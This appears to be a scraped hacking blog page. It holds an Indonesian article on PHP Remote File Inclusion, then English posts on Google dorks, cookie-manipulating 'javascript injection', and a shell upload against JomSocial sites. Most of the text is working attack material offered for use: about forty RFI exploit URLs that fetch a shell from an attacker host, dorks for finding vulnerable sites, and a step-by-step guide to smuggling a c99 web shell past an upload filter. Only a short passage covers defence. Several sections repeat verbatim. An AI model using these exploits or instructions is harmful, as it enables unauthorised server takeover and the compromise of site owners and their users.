include($my_ms[”root”].’/error.php’);
…
Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit
script PHP Incetion:
http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?
2. Setting dalam file PHP.ini
register_globals=On
magic_quotes=off
allow_fopenurl=on
CONTOH SERANGAN DENGAN MENGGUNAKAN TEKNIK RFI
———————————————
Pada kesempatan kali ini penulis akan memberikan sebuah contoh penyerangan dengan menggunakan teknik Remote File Inclusion. Yang akan penulis jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yang tidak terfilter dengan baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dengan menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :
http://target.com/Commence/includes/
db_connect.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
main_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
output_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
user_authen_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
page.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
TINGKAT BAHAYA
————–
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.
APA YANG HARUS DILAKUKAN
————————-
Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Artikel diatas penulis tulis berdasarkan pengetahuan yang penulis miliki, apabila terdapat kesalahan dimohon masukan dan pencerahannya.
Referensi:
http://www.milw0rm.com
Asset Manager :Shell and Files upload Vulnerability
Asset Manager :Shell and Files upload Vulnerability
Google Dork : "inurl:Editor/assetmanager/assetmanager.asp"Open Google.com/ncr and enetr this dork
"inurl:Editor/assetmanager/assetmanager.asp"
Now Open any site from search results
Now You will Got a Page Like That
Google Dork : "inurl:Editor/assetmanager/assetmanager.asp"Open Google.com/ncr and enetr this dork
"inurl:Editor/assetmanager/assetmanager.asp"
Now Open any site from search results
Now You will Got a Page Like That
| |||
Javascript Killer Javascript Injection : Fun with Javascripts
javascript Injection is Similar to CSRF vulnerability ,
its just for fun, but sometimes you can get cookies of vulnerable website by using Javascript injection,
Take a Look of javascript injection
[Note : working in Firefox Only]
Alert and Changing Title on Website
Javascript: alert(document.title = "title name");
You can Chnage Title of website by putting this script in you browser
and you'll get a Alert too ..
Message On website on alert Box
Javascript: alert("you message here");
use this script for more than one message
javascript: alert("First message"); alert("second message"); alert("Third message");

you can show you message on website by putting this script on browser URL box
Getting Cookies By javascripts
you can use these scripts to get and chnage cookies of website

alert(document.cookie);
javascript:void(document.cookie="Cookie_name=Cookie_value");
javascript:void(document.cookie="username=user123"); alert(document.cookie);
javascript:void(document.cookie="username=user123"); void(document.cookie="password=pass123"); alert(document.cookie);
its just for fun, but sometimes you can get cookies of vulnerable website by using Javascript injection,
Take a Look of javascript injection
[Note : working in Firefox Only]
Alert and Changing Title on Website
Javascript: alert(document.title = "title name");
You can Chnage Title of website by putting this script in you browser
and you'll get a Alert too ..
Message On website on alert Box
Javascript: alert("you message here");
use this script for more than one message
javascript: alert("First message"); alert("second message"); alert("Third message");

you can show you message on website by putting this script on browser URL box
Getting Cookies By javascripts
you can use these scripts to get and chnage cookies of website

alert(document.cookie);
javascript:void(document.cookie="Cookie_name=Cookie_value");
javascript:void(document.cookie="username=user123"); alert(document.cookie);
javascript:void(document.cookie="username=user123"); void(document.cookie="password=pass123"); alert(document.cookie);
JomSocial ~ Joomla Shell Upload Vulnerability
Stuff you need:
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain :)
Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*
Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos
Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. "myshell")
3. Copy the shell to the same folder and rename it to "yourshell.php.flv"
4. Now in your folder you have 2 files, "myshell.php" & "myshell.php.flv".
Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.
Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called "myshell.php.flv", is to trick the uploader into thinking that you are uploading a FLV file.
Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your "myshell.php.flv".
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for "myshell.php.flv" then delete the .flv part meaning you will have "myshell.php" left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.
Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your "random.php"
6. And your IN!
Firefox
A Shell
Tamper Data
Vulnerable Site
& a Brain :)
Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*
Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos
Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. "myshell")
3. Copy the shell to the same folder and rename it to "yourshell.php.flv"
4. Now in your folder you have 2 files, "myshell.php" & "myshell.php.flv".
Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.
Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called "myshell.php.flv", is to trick the uploader into thinking that you are uploading a FLV file.
Uploading shell:
1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your "myshell.php.flv".
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for "myshell.php.flv" then delete the .flv part meaning you will have "myshell.php" left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.
Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your "random.php"
6. And your IN!
Langganan:
Postingan (Atom)
"Custom Upload" Sql injection remote php shell upload vulnreblity
Google Dork : inurl:customupload.html Poc : fileupload.html Author : NoEntryPhc SQL injection vulnreblity : Goto Google.com and ...
-
paw is a Vunerablity, you Can Upload your deface & Shell Easily in Vunerable websites Lets Start open www.google.com enter T...
-
et's get started: Type: VP-ASP Shopping Cart Version: 5.00 How to find a VP-ASP 5.00 site? VP-ASP 5.00 Finding a site is very simple...
-
javascript Injection is Similar to CSRF vulnerability , its just for fun, but sometimes you can get cookies of vulnerable website by usin...
